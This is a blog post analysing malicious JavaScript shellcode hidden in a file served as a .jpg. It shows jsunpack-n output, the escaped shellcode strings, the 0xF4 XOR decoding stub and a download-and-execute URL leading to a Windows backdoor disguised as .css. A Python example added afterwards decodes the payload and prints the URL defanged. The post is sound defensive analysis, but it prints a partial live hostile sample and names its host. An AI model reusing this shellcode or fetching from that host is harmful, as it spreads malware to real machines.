shellcode does what?!

I had an IPS event pop up that I got to review.

The file is a static JavaScript variable (bit of an oxymoron, I know 😛) that had shellcode defined.

I ran the URL through my local jsunpack and had a look at what it was able to find.

matt@malicious:~/research/jsunpack-n$ ./jsunpack-n.py -a -V -u "bbs. xcdx169. net /images /img /k /lll.jpg"
URL fetch bbs. xcdx169. net /images /img /k /lll.jpg
saved 4420 bytes to ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a

Processing ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a
[nothing detected] bbs. xcdx169. net /images /img /k /lll.jpg
info: [decodingLevel=0] found JavaScript
info: saved original parsed JavaScript to ./files/veryverbose_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a

[file] created ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a from bbs. xcdx169. net /images /img /k /lll.jpg
[file] created ./files/veryverbose_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a from bbs. xcdx169. net /images /img /k /lll.jpg

matt@malicious:~/research/jsunpack-n$ cat ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a

var YT00=”\xu10EB\xu4B5B\xuC933\xuFBB1\xu04B5\xu3480\xuF40B\xuFAE2\xu05EB\xuEBE8\xuFFFF\xu1DFF\xuF0AE\xuF4F4\xu90AB\xuC455″;
var YT01=”\xuF4F4\xu7FF4\xuF8B4\xu847F\xu59E8\xu9C7F\xu7FFC\xu9E03\xuADFB\xu0E1C\xuF4F7\xu16F4\xu9E0D\xu9C98\xu809A\xu9890″;

… Cut for blog (download link above if you want to look at the full thing.)

var YT23=”\xuD0AA\xu29F7\xu7F92\xuBFF8\xuAA7F\xuF7E8\xu7F29\xu7FF0\xu31F7\xuAA5F\xu37AD\xu551C\xu0B0F\xu7A0B\xuFABA\xu5E18″;
var YT24=”\xuF908\xu7C88\xuB90E\xu512F\xuF4E3\xuE288\xu0E91\xuEBE4\xuFE8D\xu0F1C\xu0963\xuD1FB\xu0B44\xu1036\xuBE30\xuEF1B”;
var YT25=”\xuB232\xu8A8D\xu162C\xu3487\xu1663\xu291B\xu4968\xu6886\xuEE61\xu559A\xuC99E\xu162C\xu953E\xuA312\xu4154\xuC24F”;
var YT26=”\xuDBEE\xuE684\xu3FF6\xu6EE1\xu8ADF\xu11AF\xuDCE8\xuBE3B\xu0FFC\xu5141\xu9CEE\xu281F\xu9A3E”;
var YT27=”\xu9c9f\xu8080\xuce84\xudbdb\xu9696\xuda87\xu978c\xu8c90\xuc2c5\xudacd\xu919a\xudb80\xu999d\xu9395\xu8791\xu9ddb\xu9399\xu9cdb\xuda8c\xu8797\xuf487\xuf4″;


(I’ve edited the shellcode from % to \x, so if you download the above file and see it is different, don’t be thinking I’m making stuff up 😛)

Since I’ve not seen what has delivered this to the user, I’m left with loading it somehow to review it.

I dump the shellcode into http://sandsprite.com/shellcode_2_exe.php which will give you a .exe file with the shellcode attached. So you can load it up in Ollydbg and have a quick look.

As you can see, there is the original stub that loads WSAStartup to load any references to Winsock calls. I’ve also highlighted, within the small piece of code attached from the shellcode, that it’s another stub, but for an XOR encryption. As you can see, the XOR key is right there: 0xF4. There are two ways to go from here. We could step through the code and let it decrypt itself or, since we know the XOR key, we can just copy and paste the rest of the shellcode into WinHex and manually let it decode the whole block.

We click OK and the code should dump out like this.

And at the end of the block we can see another URL that will be downloaded by the shellcode and executed.
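The WinHex step can also be done statically. The following is an added example, not part of the original post: it takes the last chunk of the sample exactly as printed above, turns the %u units into bytes the way unescape() would, XORs them with the 0xF4 key read from the stub, and prints any URL defanged. The `guess_keys` brute force goes beyond the post, for samples where the key is not visible in the stub; all function names are my own.

```python
import re

# Last chunk of the sample as printed in the post (the author's "\xu" notation;
# the original file used "%u"). The trailing 2-digit token is incomplete and is skipped.
YT27 = r"\xu9c9f\xu8080\xuce84\xudbdb\xu9696\xuda87\xu978c\xu8c90\xuc2c5\xudacd\xu919a\xudb80\xu999d\xu9395\xu8791\xu9ddb\xu9399\xu9cdb\xuda8c\xu8797\xuf487\xuf4"

UNIT = re.compile(r"(?:%|\\x)u([0-9a-fA-F]{4})")   # accepts %uXXXX or \xuXXXX
URL = re.compile(rb"https?://[\x21-\x7e]+")         # printable ASCII run after the scheme


def unescape_to_bytes(text):
    """Mimic JavaScript unescape(): each unit is 16 bits, laid out little-endian."""
    out = bytearray()
    for unit in UNIT.findall(text):
        value = int(unit, 16)
        out += bytes((value & 0xFF, value >> 8))
    return bytes(out)


def xor_decode(data, key):
    """Apply a single-byte XOR key to every byte."""
    return bytes(b ^ key for b in data)


def defang(url):
    """Make a URL safe to paste into a ticket or report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def find_urls(data, key):
    """Return defanged URLs visible after XOR-decoding data with key."""
    plain = xor_decode(data, key)
    return [defang(m.group().decode("ascii")) for m in URL.finditer(plain)]


def guess_keys(data):
    """Try all 256 single-byte keys and keep those that reveal a URL."""
    return [key for key in range(256) if find_urls(data, key)]


if __name__ == "__main__":
    raw = unescape_to_bytes(YT27)
    print("candidate keys:", [hex(k) for k in guess_keys(raw)])
    for url in find_urls(raw, 0xF4):
        print(url)
```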

matt@malicious:~/research/jsunpack-n$ ./jsunpack-n.py -a -V -u "http://bbs. xcdx169. net /images /img /hx.css"
URL fetch bbs. xcdx169. net /images /img /hx.css
saved 25088 bytes to ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef

Processing ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef
[nothing detected] [MZ] bbs. xcdx169. net /images /img /hx.css
info: [0] executable file

[file] created ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef from bbs. xcdx169. net /images /img /hx.css

matt@malicious:~/research/jsunpack-n$ file ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef
./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
matt@malicious:~/research/jsunpack-n$ md5sum ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef
883e3c54c21fda4efae0fc85ff96724c  ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef

We have a .exe file loaded from the site which hosted it as a .css. This .exe has reasonable coverage from VirusTotal.



1 Response to “shellcode does what?!”

  1. 1 Http_Referer
    December 7, 2009 at 1:08 am

    More details about the backdoor are available in the Ginwui.A description.
